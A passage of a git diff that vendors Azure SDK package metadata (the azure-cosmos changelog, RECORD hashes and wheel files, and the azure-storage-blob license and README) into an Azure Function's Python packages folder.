+Version 4.0.0b1 is the first preview of our efforts to create a user-friendly and Pythonic client library for Azure Cosmos.
For more information about this, and preview releases of other Azure SDK libraries, please visit https://aka.ms/azure-sdk-preview1-python.
+
+**Breaking changes: New API design**
+
+- Operations are now scoped to a particular client:
+  - `CosmosClient`: This client handles account-level operations. This includes managing service properties and listing the databases within an account.
+  - `Database`: This client handles database-level operations. This includes creating and deleting containers, users and stored procedures. It can be accessed from a `CosmosClient` instance by name.
+  - `Container`: This client handles operations for a particular container. This includes querying and inserting items and managing properties.
+  - `User`: This client handles operations for a particular user. This includes adding and deleting permissions and managing user properties.
+
+  These clients can be accessed by navigating down the client hierarchy using the `get_<child>_client` method. For full details on the new API, please see the [reference documentation](https://aka.ms/azsdk-python-cosmos-ref).
+- Clients are accessed by name rather than by Id. No need to concatenate strings to create links.
+- No more need to import types and methods from individual modules. The public API surface area is available directly in the `azure.cosmos` package.
+- Individual request properties can be provided as keyword arguments rather than constructing a separate `RequestOptions` instance.
+
+## 3.0.2
+
+- Added support for the MultiPolygon datatype
+- Bug fix in the session read retry policy
+- Bug fix for incorrect padding issues while decoding base64 strings
+
+## 3.0.1
+
+- Bug fix in LocationCache
+- Bug fix in endpoint retry logic
+- Fixed documentation
+
+## 3.0.0
+
+- Multi-region write support added
+- Naming changes
+  - DocumentClient to CosmosClient
+  - Collection to Container
+  - Document to Item
+  - Package name updated to "azure-cosmos"
+  - Namespace updated to "azure.cosmos"
+
+## 2.3.3
+
+- Added support for proxy
+- Added support for reading the change feed
+- Added support for collection quota headers
+- Bugfix for the large session tokens issue
+- Bugfix for the ReadMedia API
+- Bugfix in the partition key range cache
+
+## 2.3.2
+
+- Added support for default retries on connection issues.
+
+## 2.3.1
+
+- Updated documentation to reference Azure Cosmos DB instead of Azure DocumentDB.
+
+## 2.3.0
+
+- This SDK version requires the latest version of the Azure Cosmos DB Emulator, available for download from https://aka.ms/cosmosdb-emulator.
+
+## 2.2.1
+
+- Bugfix for aggregate dict
+- Bugfix for trimming slashes in the resource link
+- Tests for unicode encoding
+
+## 2.2.0
+
+- Added support for the Request Unit per Minute (RU/m) feature.
+- Added support for a new consistency level called ConsistentPrefix.
+
+## 2.1.0
+
+- Added support for aggregation queries (COUNT, MIN, MAX, SUM, and AVG).
+- Added an option for disabling SSL verification when running against the DocumentDB Emulator.
+- Removed the restriction that the dependent requests module be exactly 2.10.0.
+- Lowered the minimum throughput on partitioned collections from 10,100 RU/s to 2,500 RU/s.
+- Added support for enabling script logging during stored procedure execution.
+- REST API version bumped to '2017-01-19' with this release.
+
+## 2.0.1
+
+- Made editorial changes to documentation comments.
+
+## 2.0.0
+
+- Added support for Python 3.5.
+- Added support for connection pooling using the requests module.
+- Added support for session consistency.
+- Added support for TOP/ORDERBY queries for partitioned collections.
+
+## 1.9.0
+
+- Added retry policy support for throttled requests. (Throttled requests receive a request rate too large exception, error code 429.)
+  By default, DocumentDB retries nine times for each request when error code 429 is encountered, honoring the retryAfter time in the response header.
+  A fixed retry interval time can now be set as part of the RetryOptions property on the ConnectionPolicy object if you want to ignore the retryAfter time returned by the server between the retries.
+  DocumentDB now waits for a maximum of 30 seconds for each request that is being throttled (irrespective of retry count) and returns the response with error code 429.
+  This time can also be overridden in the RetryOptions property on the ConnectionPolicy object.
+
+- DocumentDB now returns x-ms-throttle-retry-count and x-ms-throttle-retry-wait-time-ms as response headers in every request to denote the throttle retry count
+  and the cumulative time the request waited between the retries.
+
+- Removed the RetryPolicy class and the corresponding property (retry_policy) exposed on the document_client class and instead introduced a RetryOptions class
+  exposing the RetryOptions property on the ConnectionPolicy class that can be used to override some of the default retry options.
+
+## 1.8.0
+
+- Added support for geo-replicated database accounts.
+- Test fixes to move the global host and masterKey into the individual test classes.
+
+## 1.7.0
+
+- Added support for the Time To Live (TTL) feature for documents.
+
+## 1.6.1
+
+- Bug fixes related to server-side partitioning to allow special characters in the partition key path.
+
+## 1.6.0
+
+- Added support for the server-side partitioned collections feature.
+
+## 1.5.0
+
+- Added a client-side sharding framework to the SDK. Implemented HashPartitionResolver and RangePartitionResolver classes.
+
+## 1.4.2
+
+- Implement Upsert. New UpsertXXX methods added to support the Upsert feature.
+- Implement ID Based Routing. No public API changes, all changes internal.
+
+## 1.3.0
+
+- Release skipped to bring the version number into alignment with other SDKs
+
+## 1.2.0
+
+- Supports GeoSpatial index.
+- Validates the id property for all resources. Ids for resources cannot contain ?, /, #, \\, characters or end with a space.
+- Adds new header "index transformation progress" to ResourceResponse.
+ +## 1.1.0 + +- Implements V2 indexing policy + +## 1.0.1 + +- Supports proxy connection + + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/RECORD new file mode 100644 index 0000000..dc0209e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/RECORD @@ -0,0 +1,152 @@ +azure/cosmos/__init__.py,sha256=gOSzcKpMT26_L9a2GlfOC39Qz2txopl6EGgVLTeCh7Q,2132 +azure/cosmos/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/__pycache__/_auth_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_base.cpython-39.pyc,, +azure/cosmos/__pycache__/_constants.cpython-39.pyc,, +azure/cosmos/__pycache__/_cosmos_client_connection.cpython-39.pyc,, +azure/cosmos/__pycache__/_default_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_endpoint_discovery_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_global_endpoint_manager.cpython-39.pyc,, +azure/cosmos/__pycache__/_gone_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_location_cache.cpython-39.pyc,, +azure/cosmos/__pycache__/_partition.cpython-39.pyc,, +azure/cosmos/__pycache__/_query_iterable.cpython-39.pyc,, +azure/cosmos/__pycache__/_range.cpython-39.pyc,, +azure/cosmos/__pycache__/_range_partition_resolver.cpython-39.pyc,, +azure/cosmos/__pycache__/_request_object.cpython-39.pyc,, +azure/cosmos/__pycache__/_resource_throttle_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_retry_options.cpython-39.pyc,, +azure/cosmos/__pycache__/_retry_utility.cpython-39.pyc,, +azure/cosmos/__pycache__/_runtime_constants.cpython-39.pyc,, +azure/cosmos/__pycache__/_session.cpython-39.pyc,, +azure/cosmos/__pycache__/_session_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_synchronized_request.cpython-39.pyc,, +azure/cosmos/__pycache__/_utils.cpython-39.pyc,, +azure/cosmos/__pycache__/_vector_session_token.cpython-39.pyc,, +azure/cosmos/__pycache__/_version.cpython-39.pyc,, +azure/cosmos/__pycache__/auth.cpython-39.pyc,, +azure/cosmos/__pycache__/container.cpython-39.pyc,, +azure/cosmos/__pycache__/cosmos_client.cpython-39.pyc,, +azure/cosmos/__pycache__/database.cpython-39.pyc,, +azure/cosmos/__pycache__/diagnostics.cpython-39.pyc,, +azure/cosmos/__pycache__/documents.cpython-39.pyc,, +azure/cosmos/__pycache__/errors.cpython-39.pyc,, +azure/cosmos/__pycache__/exceptions.cpython-39.pyc,, +azure/cosmos/__pycache__/http_constants.cpython-39.pyc,, +azure/cosmos/__pycache__/offer.cpython-39.pyc,, +azure/cosmos/__pycache__/partition_key.cpython-39.pyc,, +azure/cosmos/__pycache__/permission.cpython-39.pyc,, +azure/cosmos/__pycache__/scripts.cpython-39.pyc,, +azure/cosmos/__pycache__/user.cpython-39.pyc,, +azure/cosmos/_auth_policy.py,sha256=SuAkDru_A6AG1QjS3Xe2xwRwv7uS0ZZIIc6BXDdGYG0,7198 +azure/cosmos/_base.py,sha256=7uwjBGjtUnbhWG1ksSlg_CsAnSbPD2FUs5AI8raJ-5k,25428 +azure/cosmos/_constants.py,sha256=YyRc-8arRJq8trVLTWxJvo7-LoRYna4ubqIMYHk73eU,1753 +azure/cosmos/_cosmos_client_connection.py,sha256=K1xkz-8pFlw8XkcP0JrQNLDzNxcuwzj0y-V1YB6qmPY,93484 +azure/cosmos/_default_retry_policy.py,sha256=ddOHZrlCykcLO32Om6wgflBgWLQfLMRINQGwP3ygldM,3274 +azure/cosmos/_endpoint_discovery_retry_policy.py,sha256=f46WVx5vyIo5kEA1mc6alOGhM9P8SXW0cyBC12JBowM,4685 +azure/cosmos/_execution_context/__init__.py,sha256=cz3FOUlbIIsSPAndnNdAwxvJ7YqW04N_NY5jjZdDOsY,1121 
+azure/cosmos/_execution_context/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/aggregators.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/base_execution_context.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/document_producer.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/endpoint_component.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/execution_dispatcher.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/multi_execution_aggregator.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/query_execution_info.cpython-39.pyc,, +azure/cosmos/_execution_context/aggregators.py,sha256=lTizSV8lfzWsrAPfc-xYGpmojP1URhKrucx8jymfOqU,3295 +azure/cosmos/_execution_context/aio/__init__.py,sha256=tvxon2u0FtnFLeIOSqCr9klTHhXvSLp1TsmZ4RhwOk0,1121 +azure/cosmos/_execution_context/aio/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/_queue_async_helper.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/base_execution_context.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/document_producer.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/endpoint_component.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/execution_dispatcher.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/multi_execution_aggregator.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/_queue_async_helper.py,sha256=RLyCjUcJUUod_J0An9FdbST4lrLRdUwmaQCnhCF8OW0,3220 +azure/cosmos/_execution_context/aio/base_execution_context.py,sha256=_io2sH6hsaUKn-ZyH6WxpdkSr7ZoNjMOwKQaivrNAlY,6203 +azure/cosmos/_execution_context/aio/document_producer.py,sha256=uYf2k7t6Q82fNfScYIpa0jKo2Nq7RJ8GmOcVHtTybvk,9216 +azure/cosmos/_execution_context/aio/endpoint_component.py,sha256=abYr6zgwZojk7mCNPsqFq44HMIAC1wiQCpZBvHAB75k,7370 +azure/cosmos/_execution_context/aio/execution_dispatcher.py,sha256=sjoSNkKkt2HJF7yOvP4elXLMMgg3IakRPsMtRv_Mbys,8954 +azure/cosmos/_execution_context/aio/multi_execution_aggregator.py,sha256=0__wggYV0PPGgNyTcH7RD2LtIUrw4OIxMn5TuaXtBhY,8507 +azure/cosmos/_execution_context/base_execution_context.py,sha256=IifxreWPVtTuGmbmOAU2TM_0JaKU0WxgY4dj5OGiBoM,6113 +azure/cosmos/_execution_context/document_producer.py,sha256=SfwgSi2oJOvrKThhrH11FcfG6VnqyW8Z3RN17G-Citk,9259 +azure/cosmos/_execution_context/endpoint_component.py,sha256=5PESZmuznx7zCPlGUCJGpXCBqNULDmZEqBtjr-6tzlI,7519 +azure/cosmos/_execution_context/execution_dispatcher.py,sha256=47KdxImr0A4q2bYnOLdi9CNLV7o0tIigdihpwbpDpxw,9125 +azure/cosmos/_execution_context/multi_execution_aggregator.py,sha256=QEVXCuy7OtSF9WQyYNoINzwmBG1hOwhrP420asHlGHI,8091 +azure/cosmos/_execution_context/query_execution_info.py,sha256=Xw0pxUsKRZi-keL-3FFoXU0YlurFbZoyIYEGyyxHGcI,4697 +azure/cosmos/_global_endpoint_manager.py,sha256=ahLAGrkSIj71AiuiwNmdtZguA_Pjk5H1liXZ8wGlhiI,7818 +azure/cosmos/_gone_retry_policy.py,sha256=uT1DpI3ivNb30qLppWpWCY0VNq4XL6LdDHIAL4Y1lC8,2302 +azure/cosmos/_location_cache.py,sha256=fkL-9YkmeekoX_RrP0LDQeFwmUHfzCs2clqjaZeRrEA,14937 +azure/cosmos/_partition.py,sha256=hF_SRVOyg9crP-7iRqqHLsNDRIA6jct9490bM6rjXBM,2625 +azure/cosmos/_query_iterable.py,sha256=XSUfO2YRhtyHZ2qHPyGFeFz-bC8ghSpKsXlzRR4oBfA,3996 +azure/cosmos/_range.py,sha256=7lsoxGPoR1B5vBGmjdBouN32yMRxYmNRBPn0iOrmLcU,2806 +azure/cosmos/_range_partition_resolver.py,sha256=pcfMbQw1u-iMs1oggei-3m3EA1ljeAAugIBf9sDy4g8,4798 
+azure/cosmos/_request_object.py,sha256=5DRWuIIcLeT4jIjKcfvJWTZMbjQSdDxqdIYL_PAQPko,2258 +azure/cosmos/_resource_throttle_retry_policy.py,sha256=8ZKQhwZtdU_7Rc7efN13GQ6OEaMAKPLa8JG0BOzLlqk,2995 +azure/cosmos/_retry_options.py,sha256=fPvjqk4Ubt9aOIeXf0fXJ9i54YRcQTbsN08mui8UCpE,2430 +azure/cosmos/_retry_utility.py,sha256=PSIDIdlIEx8YaXeZZ8YMJvmMTHu-wwHmHQlw7GwVtz8,10139 +azure/cosmos/_routing/__init__.py,sha256=cz3FOUlbIIsSPAndnNdAwxvJ7YqW04N_NY5jjZdDOsY,1121 +azure/cosmos/_routing/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/_routing/__pycache__/collection_routing_map.cpython-39.pyc,, +azure/cosmos/_routing/__pycache__/routing_map_provider.cpython-39.pyc,, +azure/cosmos/_routing/__pycache__/routing_range.cpython-39.pyc,, +azure/cosmos/_routing/aio/__init__.py,sha256=tvxon2u0FtnFLeIOSqCr9klTHhXvSLp1TsmZ4RhwOk0,1121 +azure/cosmos/_routing/aio/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/_routing/aio/__pycache__/routing_map_provider.cpython-39.pyc,, +azure/cosmos/_routing/aio/routing_map_provider.py,sha256=-Xb4KFlXsscgCguodE1Zkr2jkj7bwRzbqBcDN390I2s,8085 +azure/cosmos/_routing/collection_routing_map.py,sha256=QzfZMO6ZaGOHIJrpHB4AFaaVlM5AiD1gt9me3k6MiMk,7562 +azure/cosmos/_routing/routing_map_provider.py,sha256=NaeqUtyMHqi4f2angvtJKsL7XCnfHmXOxYZ3AKRB8xQ,7963 +azure/cosmos/_routing/routing_range.py,sha256=Tj2GG8IHVZKcV0BqOj6dqDYiFFdDFh6HbX8iz1luXeI,4520 +azure/cosmos/_runtime_constants.py,sha256=GACtBV4yE8hAvKbGpup2dUJZzWdFBvC-FSGR9Ty-AOc,1696 +azure/cosmos/_session.py,sha256=mXXD3-hooXVC4uePZ2skVguDV5wSn4xg_6L9vHvJjAc,9656 +azure/cosmos/_session_retry_policy.py,sha256=Mi44vcKlqztifnI4Mk-kgvGGQgQvcOYp5GTiOZu6_yY,5771 +azure/cosmos/_synchronized_request.py,sha256=ko5ktjf-xaM2f6ZN3HxDdX47wqxt8kggTU--Q-InSg8,7918 +azure/cosmos/_utils.py,sha256=MnaZghbLPxmjSSdF2l1Qno7UqPIuNvssr00M8ijRG9Y,1990 +azure/cosmos/_vector_session_token.py,sha256=rI-XfDBhl5aiDh-58qQ7AL4vohayKM6chylK65ttbeY,6575 +azure/cosmos/_version.py,sha256=SkGEnyCt54yV6To5kn44J1TKBqPs2XdPZMZJx46nWzk,1140 +azure/cosmos/aio/__init__.py,sha256=fZhNrJ452z0eONWBYDbMil0E35B4izXslqpoPEAoOgo,1417 +azure/cosmos/aio/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_asynchronous_request.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_auth_policy_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_container.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_cosmos_client.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_cosmos_client_connection_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_database.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_global_endpoint_manager_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_query_iterable_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_retry_utility_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_scripts.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_user.cpython-39.pyc,, +azure/cosmos/aio/_asynchronous_request.py,sha256=GkWPjLXZAH3wbFoINY2rFG4fNB3SO807hI0TQrqSdg0,7239 +azure/cosmos/aio/_auth_policy_async.py,sha256=w2ox2tTa3MDf_rRtwy1nQWRMXN2BVWktjB_FttJhrNQ,8185 +azure/cosmos/aio/_container.py,sha256=RJ8JR6i8ukQkYBCo4I6AesTBWWtvdVggTl6ZZzfZy_k,39551 +azure/cosmos/aio/_cosmos_client.py,sha256=p4ZBz_Yp4vwmrtl1fvn_pMslJPLHW-qoPYNIuMIQy7k,18681 +azure/cosmos/aio/_cosmos_client_connection_async.py,sha256=gF8tAAXQQaWIq3TvJEjaFRg7R12MvRZlH1g7Z__N-S0,92059 +azure/cosmos/aio/_database.py,sha256=H0cRZpXQkT7UJ6XcZ-dImenEoJ0KvKJ9P3kr5ZctPH8,38861 +azure/cosmos/aio/_global_endpoint_manager_async.py,sha256=oJD6iMicJvSD2HpAD9ESt1HzZIoaHfu3xXm9_Qcielo,7768 
+azure/cosmos/aio/_query_iterable_async.py,sha256=6wJqFSheS0qwhv05kJWIu5mKcQus8013sJV-Dp2hXIw,4215 +azure/cosmos/aio/_retry_utility_async.py,sha256=5RRSX24oEbQv3YDNww6bd-IV-3QyjlefQscwRc0mfOg,9575 +azure/cosmos/aio/_scripts.py,sha256=tAvRa92SuZ0UPuhKD-bcyAz1Ifg_YTwSQMa6H3_pi6U,22102 +azure/cosmos/aio/_user.py,sha256=sTGKunNHXKMZ6jTse7G9ac9FAseWjjhK4P7jM4or4qY,14320 +azure/cosmos/auth.py,sha256=V4iZ8JSbRZkDkFjsCIu79r0xvpmvbk-GWU_jyu6MN_0,6007 +azure/cosmos/container.py,sha256=Q2eKHJoqlu8jUuAhPZccmc8AHMyUzQP-qrUicylYLqI,40882 +azure/cosmos/cosmos_client.py,sha256=TJjsXNK_tB8YYzvL-MSZrf6uac39mNhLfG7-oPdGmeU,23589 +azure/cosmos/database.py,sha256=XyoSpVetlkz5Hf-NSktgtzsEjfssSTROH-XmsTbb9Io,39017 +azure/cosmos/diagnostics.py,sha256=YZWZJCPqUJ0IhowbBfWfe1ZwvM04K0tfVwXl_4lO0uE,2720 +azure/cosmos/documents.py,sha256=5FA38GKfvFP7nep7BHwXntweH4mk2EjYJEL7S-G0QYs,15256 +azure/cosmos/errors.py,sha256=VlU7QVu5pS07gtEANnbhqjm4AbeRuC1nM_uft3gmFtA,1509 +azure/cosmos/exceptions.py,sha256=MWQjFRVvK-K3bXNLbPOpGooKpTEGskdyJt7EbKCjmPw,3427 +azure/cosmos/http_constants.py,sha256=y72FsJM-X39Fd_GX4mKdiQZYcZgFPB6lLeoe4UU2blE,13567 +azure/cosmos/offer.py,sha256=dZJKD8HgCjZegP4A7QMXRoh0LlVyPsccSd6GnbAXHjk,1719 +azure/cosmos/partition_key.py,sha256=kwHYVENGKdQ8-Ue7ThSu3RXl8Ea0R6wwR7IflAddP-M,2861 +azure/cosmos/permission.py,sha256=BdfOhL5oEk56Ho55EO0DNzyECB0TZEQBGyLwubw1Xe0,1848 +azure/cosmos/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure/cosmos/scripts.py,sha256=xF4Mqk1a2raQFjuBvIF6VJPuI_kmw0lC1KiRcUKAvSk,19608 +azure/cosmos/user.py,sha256=OaCHVdEGX9zFOustJwuWQ3JI9UQghTCOydlA3igdKeE,12762 +azure_cosmos-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +azure_cosmos-4.3.0.dist-info/LICENSE,sha256=_VMkgdgo4ToLE8y1mOAjOKNhd0BnWoYu5r3BVBto6T0,1073 +azure_cosmos-4.3.0.dist-info/METADATA,sha256=F4LnYWM8LR_plg0wUQKXtYRYi5uIJQSjeigCG3BN-a0,47758 +azure_cosmos-4.3.0.dist-info/RECORD,, +azure_cosmos-4.3.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure_cosmos-4.3.0.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 +azure_cosmos-4.3.0.dist-info/top_level.txt,sha256=S7DhWV9m80TBzAhOFjxDUiNbKszzoThbnrSz5MpbHSQ,6 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/REQUESTED b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/REQUESTED new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/top_level.txt new file mode 100644 index 0000000..f6434ca --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/top_level.txt @@ -0,0 +1 @@ +azure diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/LICENSE new file mode 100644 index 0000000..4437826 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/LICENSE @@ -0,0 +1,21 @@ +Copyright (c) Microsoft Corporation. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. 
\ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/METADATA new file mode 100644 index 0000000..e09846f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/METADATA @@ -0,0 +1,487 @@ +Metadata-Version: 2.1 +Name: azure-storage-blob +Version: 12.12.0 +Summary: Microsoft Azure Blob Storage Client Library for Python +Home-page: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob +Author: Microsoft Corporation +Author-email: ascl@microsoft.com +License: MIT License +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: License :: OSI Approved :: MIT License +Requires-Python: >=3.6 +Description-Content-Type: text/markdown +Requires-Dist: azure-core (<2.0.0,>=1.23.1) +Requires-Dist: msrest (>=0.6.21) +Requires-Dist: cryptography (>=2.1.4) + +# Azure Storage Blobs client library for Python +Azure Blob storage is Microsoft's object storage solution for the cloud. Blob storage is optimized for storing massive amounts of unstructured data, such as text or binary data. + +Blob storage is ideal for: + +* Serving images or documents directly to a browser +* Storing files for distributed access +* Streaming video and audio +* Storing data for backup and restore, disaster recovery, and archiving +* Storing data for analysis by an on-premises or Azure-hosted service + +[Source code](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/azure/storage/blob) | [Package (PyPI)](https://pypi.org/project/azure-storage-blob/) | [API reference documentation](https://aka.ms/azsdk-python-storage-blob-ref) | [Product documentation](https://docs.microsoft.com/azure/storage/) | [Samples](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples) + + +## Getting started + +### Prerequisites +* Python 3.6 or later is required to use this package. +* You must have an [Azure subscription](https://azure.microsoft.com/free/) and an +[Azure storage account](https://docs.microsoft.com/azure/storage/common/storage-account-overview) to use this package. 
+
+### Install the package
+Install the Azure Storage Blobs client library for Python with [pip](https://pypi.org/project/pip/):
+
+```bash
+pip install azure-storage-blob
+```
+
+### Create a storage account
+If you wish to create a new storage account, you can use the
+[Azure Portal](https://docs.microsoft.com/azure/storage/common/storage-quickstart-create-account?tabs=azure-portal),
+[Azure PowerShell](https://docs.microsoft.com/azure/storage/common/storage-quickstart-create-account?tabs=azure-powershell),
+or [Azure CLI](https://docs.microsoft.com/azure/storage/common/storage-quickstart-create-account?tabs=azure-cli):
+
+```bash
+# Create a new resource group to hold the storage account -
+# if using an existing resource group, skip this step
+az group create --name my-resource-group --location westus2
+
+# Create the storage account
+az storage account create -n my-storage-account-name -g my-resource-group
+```
+
+### Create the client
+The Azure Storage Blobs client library for Python allows you to interact with three types of resources: the storage
+account itself, blob storage containers, and blobs. Interaction with these resources starts with an instance of a
+[client](#clients). To create a client object, you will need the storage account's blob service account URL and a
+credential that allows you to access the storage account:
+
+```python
+from azure.storage.blob import BlobServiceClient
+
+service = BlobServiceClient(account_url="https://<my_account_name>.blob.core.windows.net/", credential=credential)
+```
+
+#### Looking up the account URL
+You can find the storage account's blob service URL using the
+[Azure Portal](https://docs.microsoft.com/azure/storage/common/storage-account-overview#storage-account-endpoints),
+[Azure PowerShell](https://docs.microsoft.com/powershell/module/az.storage/get-azstorageaccount),
+or [Azure CLI](https://docs.microsoft.com/cli/azure/storage/account?view=azure-cli-latest#az-storage-account-show):
+
+```bash
+# Get the blob service account url for the storage account
+az storage account show -n my-storage-account-name -g my-resource-group --query "primaryEndpoints.blob"
+```
+
+#### Types of credentials
+The `credential` parameter may be provided in a number of different forms, depending on the type of
+[authorization](https://docs.microsoft.com/azure/storage/common/storage-auth) you wish to use:
+1. To use an [Azure Active Directory (AAD) token credential](https://docs.microsoft.com/azure/storage/common/storage-auth-aad),
+   provide an instance of the desired credential type obtained from the
+   [azure-identity](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/identity/azure-identity#credentials) library.
+   For example, [DefaultAzureCredential](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/identity/azure-identity#defaultazurecredential)
+   can be used to authenticate the client.
+
+   This requires some initial setup:
+   * [Install azure-identity](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/identity/azure-identity#install-the-package)
+   * [Register a new AAD application](https://docs.microsoft.com/azure/active-directory/develop/quickstart-register-app) and give permissions to access Azure Storage
+   * [Grant access](https://docs.microsoft.com/azure/storage/common/storage-auth-aad-rbac-portal) to Azure Blob data with RBAC in the Azure Portal
+   * Set the values of the client ID, tenant ID, and client secret of the AAD application as environment variables:
+     AZURE_TENANT_ID, AZURE_CLIENT_ID, AZURE_CLIENT_SECRET
+
+   Use the returned token credential to authenticate the client:
+   ```python
+   from azure.identity import DefaultAzureCredential
+   from azure.storage.blob import BlobServiceClient
+   token_credential = DefaultAzureCredential()
+
+   blob_service_client = BlobServiceClient(
+       account_url="https://<my_account_name>.blob.core.windows.net",
+       credential=token_credential
+   )
+   ```
+
+2. To use a [shared access signature (SAS) token](https://docs.microsoft.com/azure/storage/common/storage-sas-overview),
+   provide the token as a string. If your account URL includes the SAS token, omit the credential parameter.
+   You can generate a SAS token from the Azure Portal under "Shared access signature" or use one of the `generate_sas()`
